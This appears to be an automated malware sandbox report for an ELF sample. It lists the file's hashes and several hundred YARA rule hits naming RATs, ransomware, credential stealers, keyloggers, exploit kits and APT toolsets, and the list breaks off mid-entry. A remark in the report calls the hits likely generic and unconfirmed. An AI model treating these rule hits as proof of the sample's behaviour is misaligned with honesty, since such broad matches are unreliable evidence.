Sample details: b3d26632c4077e731ef2da329974519d

Hashes
MD5: b3d26632c4077e731ef2da329974519d
SHA1: fa837d7774048cb973e13d03c1a005c33fb9d7b5
SHA256: af52511fbd46fecb30055956fa44ee756aedc845448d68c1f2f6f21f80cb514d
SSDEEP: 6144:D/nu8Ob6UmiiNZZaqnvwhcYMHpn1OSQPpbTrNPTVOQk8x:7nu8pUmiiNZZfnCcLJCPZrycx
Details
File Type: ELF
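Yara Hits (the rule names below span Windows, Android, PHP, JavaScript and Linux signatures although the file type is reported as ELF; a hit list this broad more likely reflects generic string matches than a single family, so treat each hit as unconfirmed until it is checked against the rule and the matched strings)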
CuckooSandbox/shellcode | CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | CuckooSandbox/vmdetect | YRP/FeliksPack3___PHP_Shells_ssh | YRP/blackhole2_jar | YRP/blackhole2_jar2 | YRP/blackhole2_jar3 | YRP/blackhole2_pdf | YRP/blackhole1_jar | YRP/blackhole2_htm | YRP/blackhole2_htm10 | YRP/blackhole2_htm11 | YRP/blackhole2_htm12 | YRP/blackhole2_htm3 | YRP/blackhole2_htm4 | YRP/blackhole2_htm5 | YRP/blackhole2_htm6 | YRP/blackhole2_htm8 | YRP/phoenix_html | YRP/phoenix_html10 | YRP/phoenix_html11 | YRP/phoenix_html2 | YRP/phoenix_html3 | YRP/phoenix_html4 | YRP/phoenix_html5 | YRP/phoenix_html6 | YRP/phoenix_html7 | YRP/phoenix_html8 | YRP/phoenix_html9 | YRP/phoenix_jar | YRP/phoenix_jar2 | YRP/phoenix_jar3 | YRP/phoenix_pdf | YRP/phoenix_pdf2 | YRP/phoenix_pdf3 | YRP/sakura_jar | YRP/sakura_jar2 | YRP/eleonore_jar | YRP/eleonore_jar2 | YRP/eleonore_jar3 | YRP/eleonore_js | YRP/eleonore_js2 | YRP/eleonore_js3 | YRP/zerox88_js2 | YRP/zerox88_js3 | YRP/crimepack_jar | YRP/crimepack_jar3 | YRP/angler_flash | YRP/angler_flash2 | YRP/angler_flash4 | YRP/angler_flash5 | YRP/angler_flash_uncompressed | YRP/angler_html | YRP/angler_html2 | YRP/angler_js | YRP/bleedinglife2_adobe_2010_1297_exploit | YRP/bleedinglife2_adobe_2010_2884_exploit | YRP/bleedinglife2_jar2 | YRP/bleedinglife2_java_2010_0842_exploit | YRP/zeus_js | YRP/fragus_htm | YRP/fragus_js | YRP/fragus_js2 | YRP/fragus_js_flash | YRP/fragus_js_java | YRP/fragus_js_quicktime | YRP/fragus_js_vml | YRP/zeroaccess_css | YRP/zeroaccess_css2 | YRP/zeroaccess_htm | YRP/zeroaccess_js | YRP/zeroaccess_js2 | YRP/zeroaccess_js3 | YRP/zeroaccess_js4 | YRP/possible_includes_base64_packed_functions | YRP/silent_banker | YRP/zbot | YRP/Borland | YRP/PESpinv04x | YRP/email_Ukraine_power_attack_content | YRP/davivienda | YRP/with_attachment | YRP/content | YRP/CryptoWall_Resume_phish | YRP/possible_exploit | YRP/XDP_embedded_PDF | YRP/Contains_hidden_PE_File_inside_a_sequence_of_numbers | 
YRP/Contains_UserForm_Object | YRP/powershell | YRP/maldoc_API_hashing | YRP/maldoc_indirect_function_call_1 | YRP/maldoc_indirect_function_call_2 | YRP/maldoc_indirect_function_call_3 | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/macrocheck | YRP/malrtf_ole2link | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/System_Tools | YRP/Browsers | YRP/RE_Tools | YRP/Antivirus | YRP/VM_Generic_Detection | YRP/VMWare_Detection | YRP/Sandboxie_Detection | YRP/VirtualPC_Detection | YRP/VirtualBox_Detection | YRP/Qemu_Detection | YRP/Dropper_Strings | YRP/Base64d_PE | YRP/Misc_Suspicious_Strings | YRP/BITS_CLSID | YRP/DebuggerCheck__PEB | YRP/DebuggerCheck__GlobalFlags | YRP/DebuggerCheck__QueryInfo | YRP/DebuggerCheck__RemoteAPI | YRP/DebuggerHiding__Thread | YRP/DebuggerHiding__Active | YRP/DebuggerException__ConsoleCtrl | YRP/DebuggerException__SetConsoleCtrl | YRP/ThreadControl__Context | YRP/DebuggerCheck__DrWatson | YRP/SEH__v3 | YRP/SEH__v4 | YRP/SEH__vba | YRP/SEH__vectored | YRP/Check_Wine | YRP/vmdetect | YRP/WMI_VM_Detect | YRP/anti_dbg | YRP/anti_dbgtools | YRP/antisb_threatExpert | YRP/antisb_sandboxie | YRP/antivm_virtualbox | YRP/antivm_vmware | YRP/disable_antivirus | YRP/disable_firewall | YRP/disable_dep | YRP/inject_thread | YRP/create_service | YRP/create_com_service | YRP/network_udp_sock | YRP/network_tcp_listen | YRP/network_dyndns | YRP/network_smtp_dotNet | YRP/network_smtp_raw | YRP/network_smtp_vb | YRP/network_p2p_win | YRP/network_irc | YRP/network_http | YRP/network_dropper | YRP/network_ftp | YRP/network_tcp_socket | YRP/network_dns | YRP/network_ssl | YRP/network_dga | YRP/bitcoin | YRP/escalate_priv | YRP/screenshot | YRP/lookupip | YRP/lookupgeo | YRP/keylogger | YRP/cred_local | YRP/sniff_audio | YRP/cred_ff | YRP/cred_vnc | YRP/cred_ie7 | YRP/sniff_lan | YRP/migrate_apc | YRP/spreading_file | YRP/spreading_share | YRP/rat_vnc | YRP/rat_rdp | YRP/rat_webcam | 
YRP/win_mutex | YRP/win_registry | YRP/win_token | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/vmdetect_misc | YRP/genericSMS | YRP/genericSMS2 | YRP/dropper | YRP/tachi | YRP/android_meterpreter | YRP/android_metasploit | YRP/dowgin | YRP/adware | YRP/dropperMapin | YRP/Mapin | YRP/SlemBunk | YRP/xbot007 | YRP/moscow_fake | YRP/marcher1 | YRP/marcher2 | YRP/marcher3 | YRP/Trojan_Dendroid | YRP/SpyNet | YRP/smsfraud1 | YRP/Mal_http_EXE | YRP/cve_2013_0074 | YRP/Linux_DirtyCow_Exploit | YRP/Exploit_MS15_077_078 | YRP/Big_Numbers0 | YRP/Big_Numbers1 | YRP/Big_Numbers2 | YRP/Big_Numbers3 | YRP/Prime_Constants_char | YRP/Prime_Constants_long | YRP/Advapi_Hash_API | YRP/Crypt32_CryptBinaryToString_API | YRP/CRC32c_poly_Constant | YRP/CRC32_poly_Constant | YRP/CRC32_table | YRP/CRC32_table_lookup | YRP/CRC32b_poly_Constant | YRP/CRC16_table | YRP/FlyUtilsCnDES_ECB_Encrypt | YRP/FlyUtilsCnDES_ECB_Decrypt | YRP/Elf_Hash | YRP/BLOWFISH_Constants | YRP/MD5_Constants | YRP/MD5_API | YRP/RC6_Constants | YRP/RIPEMD160_Constants | YRP/SHA1_Constants | YRP/SHA512_Constants | YRP/TEAN | YRP/WHIRLPOOL_Constants | YRP/Miracl_powmod | YRP/Miracl_crt | YRP/CryptoPP_a_exp_b_mod_c | YRP/CryptoPP_modulo | YRP/FGint_MontgomeryModExp | YRP/FGint_FGIntModExp | YRP/FGint_MulByInt | YRP/FGint_DivMod | YRP/FGint_FGIntDestroy | YRP/FGint_Base10StringToGInt | YRP/FGint_ConvertBase256to64 | YRP/FGint_ConvertHexStringToBase256String | YRP/FGint_Base256StringToGInt | YRP/FGint_FGIntToBase256String | YRP/FGint_ConvertBase256StringToHexString | YRP/FGint_PGPConvertBase256to64 | YRP/FGint_RSAEncrypt | YRP/FGint_RsaDecrypt | YRP/FGint_RSAVerify | YRP/FGint_FindPrimeGoodCurveAndPoint | YRP/FGint_ECElGamalEncrypt | YRP/FGint_ECAddPoints | YRP/FGint_ECPointKMultiple | YRP/FGint_ECPointDestroy | YRP/FGint_DSAPrimeSearch | YRP/FGint_DSASign | YRP/FGint_DSAVerify | YRP/DES_Long | YRP/DES_sbox | YRP/DES_pbox_long | YRP/OpenSSL_BN_mod_exp2_mont | YRP/OpenSSL_BN_mod_exp_mont | 
YRP/OpenSSL_BN_mod_exp_recp | YRP/OpenSSL_BN_mod_exp_simple | YRP/OpenSSL_BN_mod_exp_inverse | YRP/OpenSSL_DSA | YRP/FGint_RsaSign | YRP/LockBox_RsaEncryptFile | YRP/LockBox_DecryptRsaEx | YRP/LockBox_EncryptRsaEx | YRP/LockBox_TlbRsaKey | YRP/BigDig_bpInit | YRP/BigDig_mpModExp | YRP/BigDig_mpModInv | YRP/BigDig_mpModMult | YRP/BigDig_mpModulo | YRP/BigDig_spModExpB | YRP/BigDig_spModInv | YRP/BigDig_spModMult | YRP/CryptoPP_ApplyFunction | YRP/CryptoPP_RsaFunction | YRP/CryptoPP_Integer_constructor | YRP/RijnDael_AES | YRP/RijnDael_AES_CHAR | YRP/RijnDael_AES_CHAR_inv | YRP/RijnDael_AES_LONG | YRP/RsaRef2_NN_modExp | YRP/RsaRef2_NN_modInv | YRP/RsaRef2_NN_modMult | YRP/RsaRef2_RsaPrivateDecrypt | YRP/RsaRef2_RsaPrivateEncrypt | YRP/RsaRef2_RsaPublicDecrypt | YRP/RsaRef2_RsaPublicEncrypt | YRP/RsaEuro_NN_modInv | YRP/RsaEuro_NN_modMult | YRP/Miracl_Big_constructor | YRP/Miracl_mirvar | YRP/Miracl_mirsys_init | YRP/BASE64_table | YRP/Delphi_Random | YRP/Delphi_RandomRange | YRP/Delphi_FormShow | YRP/Delphi_CompareCall | YRP/Delphi_Copy | YRP/Delphi_IntToStr | YRP/Delphi_StrToInt | YRP/Delphi_DecodeDate | YRP/Unknown_Random | YRP/VC6_Random | YRP/VC8_Random | YRP/DCP_RIJNDAEL_Init | YRP/DCP_RIJNDAEL_EncryptECB | YRP/DCP_BLOWFISH_Init | YRP/DCP_BLOWFISH_EncryptCBC | YRP/DCP_DES_Init | YRP/DCP_DES_EncryptECB | YRP/TeslaCrypt | YRP/Shifu | YRP/WoolenGoldfish_Generic_3 | YRP/Cerberus | YRP/dump_sales_quote_payment | YRP/dump_sales_order | YRP/md5_64651cede2467fdeb1b3b7e6ff3f81cb | YRP/md5_6bf4910b01aa4f296e590b75a3d25642 | YRP/fopo_webshell | YRP/eval_post | YRP/spam_mailer | YRP/md5_2c37d90dd2c9c743c273cb955dd83ef6 | YRP/md5_3ccdd51fe616c08daafd601589182d38 | YRP/md5_4b69af81b89ba444204680d506a8e0a1 | YRP/md5_87cf8209494eedd936b28ff620e28780 | YRP/md5_fb9e35bf367a106d18eb6aa0fe406437 | YRP/md5_8e5f7f6523891a5dcefcbb1a79e5bbe9 | YRP/eval_base64_decode_a | YRP/md5_ab63230ee24a988a4a9245c2456e4874 | YRP/md5_d30b23d1224438518d18e90c218d7c8b | 
YRP/md5_24f2df1b9d49cfb02d8954b08dba471f | YRP/md5_fd141197c89d27b30821f3de8627ac38 | YRP/visbot | YRP/md5_4c4b3d4ba5bce7191a5138efa2468679 | YRP/md5_6eb201737a6ef3c4880ae0b8983398a9 | YRP/md5_d201d61510f7889f1a47257d52b15fa2 | YRP/md5_06e3ed58854daeacf1ed82c56a883b04 | YRP/md5_28690a72362e021f65bb74eecc54255e | YRP/fake_magentoupdate_site | YRP/md5_4aa900ddd4f1848a15c61a9b7acd5035 | YRP/glassrat | YRP/iexpl0reCode | YRP/iexpl0reStrings | YRP/iexpl0re | YRP/memory_pivy | YRP/memory_shylock | YRP/Cloaked_as_JPG | YRP/rtf_yahoo_ken | YRP/ZXProxy | YRP/EmiratesStatement | YRP/SpyGate_v2_9 | YRP/qadars | YRP/shylock | YRP/spyeye | YRP/spyeye_plugins | YRP/callTogether_certificate | YRP/qti_certificate | YRP/DownExecute_A | YRP/Pandora | YRP/Base64_encoded_Executable | YRP/Invoke_mimikittenz | YRP/Bublik | YRP/Derkziel | YRP/EquationGroup_elgingamble | YRP/EquationGroup_sambal | YRP/EquationGroup__jparsescan_parsescan_5 | YRP/EquationGroup_noclient_3_3_2 | YRP/EquationGroup_Toolset_Apr17_Gen2 | YRP/EquationGroup_Toolset_Apr17_ntevt | YRP/EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld | YRP/LogPOS | YRP/apt_regin_rc5key | YRP/GEN_PowerShell | YRP/moose | YRP/function_through_object | YRP/php_malfunctions | YRP/php_obf_malfunctions | YRP/fopo_obfuscator | YRP/html_upload | YRP/php_uname | YRP/scriptkiddies | YRP/apt_hellsing_implantstrings | YRP/SharedStrings | YRP/Njrat | YRP/njrat1 | YRP/network_traffic_njRAT | YRP/Ransom_CryptXXX_Dropper | YRP/Ransom_CryptXXX_Real | YRP/WimmieShellcode | YRP/WimmieStrings | YRP/Wimmie | YRP/XOR_DDosv1 | YRP/KelihosHlux | YRP/Wabot | YRP/TROJAN_Notepad | YRP/CrowdStrike_Shamoon_DroppedFile | YRP/APT_bestia | YRP/FavoriteCode | YRP/FavoriteStrings | YRP/Trojan_W32_Gh0stMiancha_1_0_0 | YRP/korlia | YRP/APT_DeputyDog_Fexel | YRP/onimiki | YRP/backoff | YRP/NaikonCode | YRP/NaikonStrings | YRP/Naikon | YRP/PubSabCode | YRP/PubSabStrings | YRP/PubSab | YRP/ChickenDOS_Linux | YRP/DDosTf | YRP/UACME_Akagi | YRP/MacControlCode | 
YRP/MacControlStrings | YRP/MacControl | YRP/CookiesStrings | YRP/Cookies | YRP/alina | YRP/YayihCode | YRP/YayihStrings | YRP/Yayih | YRP/MongalCode | YRP/MongalStrings | YRP/Mongal | YRP/BoousetCode | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | YRP/StuxNet_Malware_1 | YRP/Scieron | YRP/IMulerCode | YRP/IMulerStrings | YRP/IMuler | YRP/Furtim_nativeDLL | YRP/GlassesCode | YRP/Glasses | YRP/EQGRP_create_dns_injection | YRP/EQGRP_tunnel_state_reader | YRP/EQGRP_eligiblecandidate | YRP/EQGRP_sniffer_xml2pcap | YRP/EQGRP_BananaAid | YRP/EQGRP_shellcode | YRP/EQGRP_jetplow_SH | YRP/EQGRP_extrabacon | YRP/EQGRP_sploit_py | YRP/EQGRP_BICECREAM | YRP/EQGRP_StoreFc | YRP/EQGRP_BARPUNCH_BPICKER | YRP/EQGRP_pandarock | YRP/EQGRP_callbacks | YRP/EQGRP_Unique_Strings | YRP/EQGRP_RC5_RC6_Opcode | YRP/GoziRule | YRP/gh0st | YRP/WarpCode | YRP/WarpStrings | YRP/Warp | YRP/EnfalCode | YRP/EnfalStrings | YRP/Enfal | YRP/QuarianStrings | YRP/QuarianCode | YRP/Quarian | YRP/urausy_skype_dat | YRP/AAR | YRP/Ap0calypse | YRP/Arcom | YRP/BlackNix | YRP/BlueBanana | YRP/ClientMesh | YRP/DarkRAT | YRP/Greame | YRP/HawkEye | YRP/Imminent | YRP/Infinity | YRP/JavaDropper | YRP/LostDoor | YRP/LuminosityLink | YRP/LuxNet | YRP/NanoCore | YRP/Paradox | YRP/Plasma | YRP/PredatorPain | YRP/Punisher | YRP/PythoRAT | YRP/QRat | YRP/SmallNet | YRP/SpyGate | YRP/Sub7Nation | YRP/UPX | YRP/Vertex | YRP/unrecom | YRP/T5000Strings | YRP/T5000 | YRP/Misdat_Backdoor | YRP/SType_Backdoor | YRP/Zlib_Backdoor | YRP/Ransom_Satana | YRP/Ransom_Satana_Dropper | YRP/universal_1337_stealer_serveur | YRP/PoisonIvy_2 | YRP/ZhoupinExploitCrew | YRP/BackDoorLogger | YRP/Jasus | YRP/NetC | YRP/ShellCreator2 | YRP/SmartCopy2 | YRP/SynFlooder | YRP/TinyZBot | YRP/antivirusdetector | YRP/csext | YRP/kagent | YRP/mimikatzWrapper | YRP/pvz_in | YRP/pvz_out | YRP/wndTest | YRP/zhCat | YRP/zhLookUp | YRP/zhmimikatz | YRP/Zh0uSh311 | 
YRP/OPCLEAVER_BackDoorLogger | YRP/OPCLEAVER_Jasus | YRP/OPCLEAVER_NetC | YRP/OPCLEAVER_ShellCreator2 | YRP/OPCLEAVER_SmartCopy2 | YRP/OPCLEAVER_SynFlooder | YRP/OPCLEAVER_TinyZBot | YRP/OPCLEAVER_ZhoupinExploitCrew | YRP/OPCLEAVER_antivirusdetector | YRP/OPCLEAVER_csext | YRP/OPCLEAVER_kagent | YRP/OPCLEAVER_mimikatzWrapper | YRP/OPCLEAVER_pvz_in | YRP/OPCLEAVER_pvz_out | YRP/OPCLEAVER_wndTest | YRP/OPCLEAVER_zhLookUp | YRP/OPCLEAVER_zhmimikatz | YRP/Bolonyokte | YRP/LinuxAESDDoS | YRP/LinuxBillGates | YRP/LinuxElknot | YRP/LinuxMrBlack | YRP/LinuxTsunami | YRP/rootkit | YRP/exploit | YRP/ldpreload | YRP/Locky_Ransomware | YRP/Locky_Ransomware_2 | YRP/BlackRev | YRP/Retefe | YRP/EzcobStrings | YRP/Ezcob | YRP/BlackShades2 | YRP/BlackShades_4 | YRP/BlackShades | YRP/BlackShades_25052015 | YRP/Tedroo | YRP/Molerats_certs | YRP/RSharedStrings | YRP/GmRemoteStrings | YRP/GmRemote | YRP/SurtrStrings | YRP/SurtrCode | YRP/Surtr | YRP/KeyBoy_Dropper | YRP/KeyBoy_Backdoor | YRP/Payload_Exe2Hex | YRP/Codoso_Gh0st_3 | YRP/Codoso_Gh0st_1 | YRP/Codoso_PGV_PVID_3 | YRP/Win32Toxic | YRP/Crimson | YRP/Havex_Trojan_PHP_Server | YRP/CSIT_14003_03 | YRP/turla_dropper | YRP/nAspyUpdateCode | YRP/nAspyUpdateStrings | YRP/nAspyUpdate | YRP/Cythosia | YRP/Powerkatz_DLL_Generic | YRP/APT_Win_Pipcreat | YRP/NSFreeCode | YRP/NSFreeStrings | YRP/NSFree | YRP/Careto_OSX_SBD | YRP/Careto_CnC | YRP/Careto_CnC_domains | YRP/apt_nix_elf_Derusbi_Linux_SharedMemCreation | YRP/apt_nix_elf_Derusbi_Linux_Strings | YRP/Trojan_Derusbi | YRP/APT_Derusbi_DeepPanda | YRP/APT_Derusbi_Gen | YRP/shimrat | YRP/shimratreporter | YRP/APT_Hikit_msrv | YRP/RooterCode | YRP/Rooter | YRP/RookieStrings | YRP/Rookie | YRP/sinlesspleasure_com | YRP/amasty_biz | YRP/amasty_biz_js | YRP/cloudfusion_me | YRP/grelos_v | YRP/hacked_domains | YRP/jquery_code_su | YRP/jquery_code_su_multi | YRP/Trafficanalyzer_js | YRP/atob_js | YRP/googieplay_js | YRP/mag_php_js | YRP/thetech_org_js | YRP/md5_cdn_js_link_js | YRP/sendsafe 
| YRP/BangatCode | YRP/BangatStrings | YRP/Bangat | YRP/apt_c16_win_memory_pcclient | YRP/apt_c16_win_wateringhole | YRP/Worm_Gamarue | YRP/StegoKatz | YRP/FiveEyes_QUERTY_Malwaresig_20123_cmdDef | YRP/FiveEyes_QUERTY_Malwareqwerty_20123 | YRP/FiveEyes_QUERTY_Malwaresig_20120_dll | YRP/FiveEyes_QUERTY_Malwaresig_20120_cmdDef | YRP/FiveEyes_QUERTY_Malwaresig_20121_cmdDef | YRP/legion_777 | YRP/APT3102Code | YRP/apt_equation_equationlaser_runtimeclasses | YRP/apt_equation_cryptotable | YRP/with_sqlite | YRP/AthenaHTTP | YRP/AthenaHTTP_v2 | YRP/AthenaIRC | YRP/APT_NGO_wuaclt | YRP/Meterpreter_Reverse_Tcp | YRP/genome | YRP/APT9002Code | YRP/APT9002Strings | YRP/APT9002 | YRP/WaterBug_wipbot_2013_dll | YRP/WaterBug_turla_dropper | YRP/Ransom_Alpha | YRP/Ransom_Alfa | YRP/Ransom | YRP/Insta11Code | YRP/Insta11Strings | YRP/Insta11 | YRP/Casper_Included_Strings | YRP/Casper_SystemInformation_Output | YRP/suspicious_packer_section | YRP/Hsdfihdf | YRP/DarkComet_2 | YRP/DarkComet_3 | YRP/DarkComet_4 | YRP/Grozlex | YRP/CryptoLocker_set1 | YRP/CryptoLocker_rule2 | YRP/BackdoorFCKG | YRP/Empire_Get_SecurityPackages | YRP/Empire_Invoke_EgressCheck | YRP/Empire_PowerShell_Framework_Gen2 | YRP/Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | YRP/CyberGate | YRP/Intel_Virtualization_Wizard_exe | YRP/Intel_Virtualization_Wizard_dll | YRP/WindowsCredentialEditor | YRP/Amplia_Security_Tool | YRP/PScan_Portscan_1 | YRP/HackTool_Samples | YRP/Fierce2 | YRP/Ncrack | YRP/SQLMap | YRP/PortScanner | YRP/NetBIOS_Name_Scanner | YRP/FeliksPack3___Scanners_ipscan | YRP/CGISscan_CGIScan | YRP/IP_Stealing_Utilities | YRP/PortRacer | YRP/scanarator | YRP/_Bitchin_Threads_ | YRP/portscan | YRP/ProPort_zip_Folder_ProPort | YRP/StealthWasp_s_Basic_PortScanner_v1_2 | YRP/BluesPortScan | YRP/scanarator_iis | YRP/Angry_IP_Scanner_v2_08_ipscan | YRP/crack_Loader | YRP/WCE_Modified_1_1014 | YRP/BypassUac_3 | YRP/Hacktools_CN_Panda_Burst | YRP/Hacktools_CN_Burst_Blast | YRP/Jc_WinEggDrop_Shell | 
YRP/LinuxHacktool_eyes_pscan2 | YRP/Mimikatz_Memory_Rule_1 | YRP/Mimikatz_Memory_Rule_2 | YRP/VSSown_VBS | YRP/LIGHTDART_APT1 | YRP/AURIGA_APT1 | YRP/BANGAT_APT1 | YRP/BISCUIT_GREENCAT_APT1 | YRP/BOUNCER_APT1 | YRP/BOUNCER_DLL_APT1 | YRP/CALENDAR_APT1 | YRP/COMBOS_APT1 | YRP/DAIRY_APT1 | YRP/GLOOXMAIL_APT1 | YRP/GOGGLES_APT1 | YRP/HACKSFASE1_APT1 | YRP/HACKSFASE2_APT1 | YRP/KURTON_APT1 | YRP/MACROMAIL_APT1 | YRP/MANITSME_APT1 | YRP/MINIASP_APT1 | YRP/NEWSREELS_APT1 | YRP/SEASALT_APT1 | YRP/STARSYPOUND_APT1 | YRP/SWORD_APT1 | YRP/thequickbrow_APT1 | YRP/TABMSGSQL_APT1 | YRP/CCREWBACK1 | YRP/TrojanCookies_CCREW | YRP/GEN_CCREW1 | YRP/Elise | YRP/EclipseSunCloudRAT | YRP/MoonProject | YRP/ccrewDownloader1 | YRP/ccrewDownloader2 | YRP/ccrewMiniasp | YRP/ccrewSSLBack2 | YRP/ccrewSSLBack3 | YRP/ccrewSSLBack1 | YRP/ccrewDownloader3 | YRP/ccrewQAZ | YRP/metaxcd | YRP/MiniASP | YRP/DownloaderPossibleCCrew | YRP/APT1_LIGHTBOLT | YRP/APT1_GETMAIL | YRP/APT1_GDOCUPLOAD | YRP/APT1_WEBC2_Y21K | YRP/APT1_WEBC2_YAHOO | YRP/APT1_WEBC2_UGX | YRP/APT1_WEBC2_TOCK | YRP/APT1_WEBC2_RAVE | YRP/APT1_WEBC2_QBP | YRP/APT1_WEBC2_HEAD | YRP/APT1_WEBC2_GREENCAT | YRP/APT1_WEBC2_DIV | YRP/APT1_WEBC2_CSON | YRP/APT1_WEBC2_CLOVER | YRP/APT1_WEBC2_BOLID | YRP/APT1_WEBC2_ADSPACE | YRP/APT1_WEBC2_AUSOV | YRP/APT1_WARP | YRP/APT1_TARSIP_ECLIPSE | YRP/APT1_TARSIP_MOON | YRP/APT1_RARSilent_EXE_PDF | YRP/APT1_aspnetreport | YRP/APT1_Revird_svc | YRP/APT1_dbg_mess | YRP/APT1_known_malicious_RARSilent | YRP/ShadowTech | YRP/SafeNetCode | YRP/SafeNetStrings | YRP/SafeNet | YRP/RegSubDatStrings | YRP/RegSubDat | YRP/Zegost | YRP/gholeeV1 | YRP/MW_gholee_v1 | YRP/NetpassStrings | YRP/NetPass | YRP/NetTravStrings | YRP/NetTravExports | YRP/NetTraveler | YRP/FVEY_ShadowBrokers_Jan17_Screen_Strings | YRP/NetWiredRC_B | YRP/cxpidStrings | YRP/cxpidCode | YRP/Spora | YRP/unk_packer | YRP/zoxPNG_RAT | YRP/xtreme_rat | YRP/XtremeRATCode | YRP/XtremeRATStrings | YRP/XtremeRAT | YRP/xtremrat | YRP/Mozart | 
YRP/IndiaCharlie_One | YRP/IndiaCharlie_Two | YRP/RomeoEcho | YRP/DeltaCharlie | YRP/PapaAlfa | YRP/IndiaAlfa_One | YRP/DestructiveTargetCleaningTool5 | YRP/DestructiveTargetCleaningTool6 | YRP/Malwareusedbycyberthreatactor1 | YRP/WhiskeyAlfa | YRP/SierraBravo_packed | YRP/LimaCharlie | YRP/RomeoJuliettMikeTwo | YRP/SierraCharlie | YRP/RomeoCharlie | YRP/IndiaBravo_PapaAlfa | YRP/IndiaBravo_RomeoCharlie | YRP/IndiaBravo_RomeoBravo | YRP/IndiaBravo_generic | YRP/TangoAlfa | YRP/wiper_unique_strings | YRP/wiper_encoded_strings | YRP/createP2P | YRP/WhiskeyDelta | YRP/REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief | YRP/REDLEAVES_CoreImplant_UniqueStrings | YRP/PLUGX_RedLeaves | YRP/diamond_fox | YRP/LuckyCatCode | YRP/OlyxCode | YRP/OlyxStrings | YRP/Olyx | YRP/cerber3 | YRP/cerber4 | YRP/cerber5 | YRP/VidgrabStrings | YRP/Vidgrab | YRP/PlugXStrings | YRP/plugX | YRP/lost_door | YRP/ScarhiknStrings | YRP/ScarhiknCode | YRP/Scarhikn | YRP/Tinba2 | YRP/MirageStrings | YRP/Mirage | YRP/Mirage_APT | YRP/IronTiger_ASPXSpy | YRP/IronTiger_wmiexec | YRP/IronPanda_Malware_Htran | YRP/citadel13xy | YRP/Citadel_Malware | YRP/Trojan_Win32_PlaSrv | YRP/Trojan_Win32_Platual | YRP/Trojan_Win32_Plaplex | YRP/Trojan_Win32_Dipsind_B | YRP/Trojan_Win32_PlaKeylog_B | YRP/Trojan_Win32_Adupib | YRP/Trojan_Win32_PlaLsaLog | YRP/Trojan_Win32_Plakelog | YRP/Trojan_Win32_Plainst | YRP/Trojan_Win32_Plagicom | YRP/Trojan_Win32_Plaklog | YRP/Trojan_Win32_Plapiio | YRP/Trojan_Win32_Plabit | YRP/Trojan_Win32_Placisc2 | YRP/Trojan_Win32_Placisc3 | YRP/Trojan_Win32_Placisc4 | YRP/Adzok | YRP/CAP_HookExKeylogger | YRP/TerminatorRat | YRP/TROJAN_Notepad_shell_crew | YRP/IMPLANT_3_v1 | YRP/IMPLANT_4_v9 | YRP/IMPLANT_5_v2 | YRP/IMPLANT_5_v3 | YRP/IMPLANT_5_v4 | YRP/Unidentified_Malware_Two | YRP/pony | YRP/TreasureHunt | YRP/easterjackpos | YRP/Ransom_Petya | YRP/Odinaff_swift | YRP/Mirai_Generic_Arch | YRP/Mirai_MIPS_LSB | YRP/Mirai_MIPS_MSB | YRP/Mirai_ARM_LSB | YRP/Mirai_Renesas_SH | 
YRP/Mirai_PPC_Cisco | YRP/Mirai_SPARC_MSB | YRP/Mirai_4 | YRP/Mirai_Dwnl | YRP/Mirai_5 | YRP/OpClandestineWolf | YRP/xRAT20 | YRP/dexter_strings | YRP/liudoor | YRP/BlackWorm | YRP/BernhardPOS | YRP/Bozok | YRP/WinntiPharma | YRP/Unit78020_Malware_Gen1 | YRP/DMALocker | YRP/DMALocker4 | YRP/lateral_movement | YRP/xRAT | YRP/ELF_Linux_Torte | YRP/ELF_Linux_Torte_domains | YRP/skeleton_key_patcher | YRP/skeleton_key_injected_code | KevTheHermit/Paradox | KevTheHermit/Bozok | KevTheHermit/ClientMesh | KevTheHermit/unrecom | KevTheHermit/DarkRAT | KevTheHermit/Greame | KevTheHermit/JavaDropper | KevTheHermit/Infinity | KevTheHermit/Arcom | KevTheHermit/LostDoor | KevTheHermit/BlackShades | KevTheHermit/PoisonIvy | KevTheHermit/Punisher | KevTheHermit/Sub7Nation | KevTheHermit/BlueBanana | KevTheHermit/PythoRAT | KevTheHermit/AAR | KevTheHermit/LuminosityLink | KevTheHermit/Crimson | KevTheHermit/NanoCore | KevTheHermit/LuxNet | KevTheHermit/SpyGate | KevTheHermit/BlackNix | KevTheHermit/SmallNet | KevTheHermit/CyberGate | KevTheHermit/xRAT | KevTheHermit/DarkComet | KevTheHermit/Pandora | KevTheHermit/Imminent | KevTheHermit/Ap0calypse | KevTheHermit/Adzok | KevTheHermit/ShadowTech | KevTheHermit/Vertex | KevTheHermit/HawkEye | FlorianRoth/Exploit_MS15_077_078 | FlorianRoth/Empire_Get_SecurityPackages | FlorianRoth/Empire_Invoke_EgressCheck | FlorianRoth/Empire_PowerShell_Framework_Gen2 | FlorianRoth/Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | FlorianRoth/FiveEyes_QUERTY_Malwaresig_20123_cmdDef | FlorianRoth/FiveEyes_QUERTY_Malwareqwerty_20123 | FlorianRoth/FiveEyes_QUERTY_Malwaresig_20120_dll | FlorianRoth/FiveEyes_QUERTY_Malwaresig_20120_cmdDef | FlorianRoth/FiveEyes_QUERTY_Malwaresig_20121_cmdDef | FlorianRoth/Mal_http_EXE | FlorianRoth/EQGRP_create_dns_injection | FlorianRoth/EQGRP_tunnel_state_reader | FlorianRoth/EQGRP_eligiblecandidate | FlorianRoth/EQGRP_sniffer_xml2pcap | FlorianRoth/EQGRP_BananaAid | FlorianRoth/EQGRP_shellcode | 
